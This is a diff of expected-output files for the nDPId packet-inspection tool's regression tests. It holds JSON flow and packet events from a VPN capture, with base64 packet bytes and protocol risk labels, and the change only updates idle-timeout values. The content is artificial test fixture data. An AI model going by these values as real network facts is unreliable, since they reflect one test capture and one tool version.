+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1569687269563,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569687269563,"pkt":"NDY7z3UopHczjPFACABFAAA8AABAAEAGJUUKAACVCgAA4x9I3np8gG11KkHDm6ASOJBP2wAAAgQFtAQCCAoAIeBIHA3YAQEDAwY="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1569687269563,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687269563,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAld56H0gqQcObfIBtdoAQEBWnIAAAAQEIChwN2AIAIeBI"} +00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687269561,"flow_last_seen":1569687269563,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":251,"flow_tot_l4_payload_len":251,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1569687269563,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56954,"dst_port":8008,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"CiscoVPN.HTTP","breed":"Acceptable","category":"Web"}} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1569687269567,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569687269567,"pkt":"NDY7z3Uo2DE0IHf7CABFAAA8AABAAEAGJUMKAACXCgAA4x983nsgu1W7gn2KRaASqbA3ZQAAAgQFtAQCCAoGktWOHA3YAQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1569687269567,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687269567,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl957H3yCfYpFILtVvIAQEBX\/yAAAAQEIChwN2AUGktWO"} +01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687269562,"flow_last_seen":1569687269567,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687269567,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56955,"dst_port":8060,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"10.0.0.151","url":"10.0.0.151:8060\/dial\/dd.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/77.0.3865.90 Safari\/537.36"}} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1569687269598,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":46,"pkt_l4_len":12,"thread_ts_msec":1569687269598,"pkt":"LH6BsEqhNDY7z3UoCABFAAAg\/t4AAEARZwsKAADjCgAAAc1zAMAADAmuEAEDEA=="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":716,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687269716,"flow_last_seen":1569687269716,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687269716,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":49816,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":716,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1569687269716,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":556,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":556,"pkt_l4_len":522,"thread_ts_msec":1569687269716,"pkt":"NDY7z3UopHczjPFACABFAAIeAABAAEARI1gKAACVCgAA48KY4MsCCjHASFRUUC8xLjEgMjAwIE9LDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTE4MDANCkRBVEU6IFNhdCwgMjggU2VwIDIwMTkgMTY6MTQ6MjkgR01UDQpFWFQ6DQpMT0NBVElPTjogaHR0cDovLzEwLjAuMC4xNDk6ODAwOC9zc2RwL2RldmljZS1kZXNjLnhtbA0KT1BUOiAiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzogYjNiMTBmNmEtMWRkMS0xMWIyLWI3NDAtYWU5NDc5MzlkMzA4DQpTRVJWRVI6IExpbnV4LzMuOC4xMyssIFVQblAvMS4wLCBQb3J0YWJsZSBTREsgZm9yIFVQblAgZGV2aWNlcy8xLjYuMTgNClgtVXNlci1BZ2VudDogcmVkc29uaWMNClNUOiB1cm46ZGlhbC1tdWx0aXNjcmVlbi1vcmc6c2VydmljZTpkaWFsOjENClVTTjogdXVpZDo3OWQ4OGU4My03MjVjLWI3MWItYmFkMC01ODYyZDViMjIzODY6OnVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KQk9PVElELlVQTlAuT1JHOiA0NzINCkNPTkZJR0lELlVQTlAuT1JHOiAxDQoNCg=="} @@ -303,7 +303,7 @@ 00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1797,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687277139,"flow_last_seen":1569687277139,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1569687277139,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1798,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1569687277144,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1569687277144,"pkt":"\/\/\/\/\/\/\/\/NDY7z3UoCABFAABOK\/AAAEAROM4KAADjCgAA\/wCJAIkAOvmHRYABEAABAAAAAAAAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAAAgAAE="} 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1809,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1569687277188,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1569687277188,"pkt":"\/\/\/\/\/\/\/\/NDY7z3UoCABFAABgQ9oAAEARINIKAADjCgAA\/wCJAIkATMRRRYEwEAABAAAAAAABIEVNRkFDTkVDREFERUREREFERkREQ05GSERIREdERUFBAAAgAAHADAAgAAEAAAAAAAZgAAoAAOM="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1569687281158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687281158,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0UBJAAPMGvOUIJWfECgAA4wG73ieGjW4CDCXQ8YARTdYkXAAAAQEICnincgAcDdF\/"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1569687281158,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687281158,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0UBJAAPMGvOUIJWfECgAA4wG73ieGjW4CDCXQ8YARTdYkXAAAAQEICnincgAcDdF\/"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2587,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687286917,"flow_last_seen":1569687286917,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687286917,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2587,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1569687286917,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1569687286917,"pkt":"AQBeAAD7pHczjPFACABFAABEAABAAP8RkBgKAACV4AAA+xTpFOkAMI4UAAAAAAABAAAAAAAAC19nb29nbGV6b25lBF90Y3AFbG9jYWwAAAwAAQ=="} 00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2587,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687286917,"flow_last_seen":1569687286917,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1569687286917,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlezone._tcp.local"}} @@ -315,19 +315,19 @@ 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2723,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1569687287737,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":16,"thread_ts_msec":1569687287737,"pkt":"AQBeAAABLH6BsEqhCABFwAAkGHoAAAEBtp0KAAAB4AAAAQkA5rYBAgVGCgAAAQAAAAAAAP\/\/Aiw="} 00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2723,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687287737,"flow_last_seen":1569687287737,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1569687287737,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":1.061278} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569687268559,"flow_last_seen":1569687271560,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":57547,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1569687249612,"flow_last_seen":1569687268122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":384,"flow_tot_l4_payload_len":3455,"flow_avg_l4_payload_len":181,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"}} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687240992,"flow_last_seen":1569687241009,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.53","src_port":56885,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687240992,"flow_last_seen":1569687241009,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.53","src_port":56885,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1569687249612,"flow_last_seen":1569687268122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":384,"flow_tot_l4_payload_len":3455,"flow_avg_l4_payload_len":181,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"}} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687240992,"flow_last_seen":1569687241009,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.53","src_port":56885,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1569687240992,"flow_last_seen":1569687241009,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.53","src_port":56885,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569687269223,"flow_last_seen":1569687272080,"flow_idle_time":180000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":1244,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1569687249612,"flow_last_seen":1569687268086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":384,"flow_tot_l4_payload_len":1372,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1569687249612,"flow_last_seen":1569687268086,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":384,"flow_tot_l4_payload_len":1372,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"ConnCheck"}} 00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687287737,"flow_last_seen":1569687287737,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246982,"flow_last_seen":1569687260293,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246982,"flow_last_seen":1569687260293,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.2","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687241657,"flow_last_seen":1569687241657,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687241452,"flow_last_seen":1569687241452,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1569687277139,"flow_last_seen":1569687283186,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":912,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260469,"flow_last_seen":1569687260521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":17,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260469,"flow_last_seen":1569687260521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":17,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260469,"flow_last_seen":1569687260521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":17,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260469,"flow_last_seen":1569687260521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":17,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"35.201.124.9","src_port":56910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687260751,"flow_last_seen":1569687260767,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687271764,"flow_last_seen":1569687271764,"flow_idle_time":180000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":51382,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 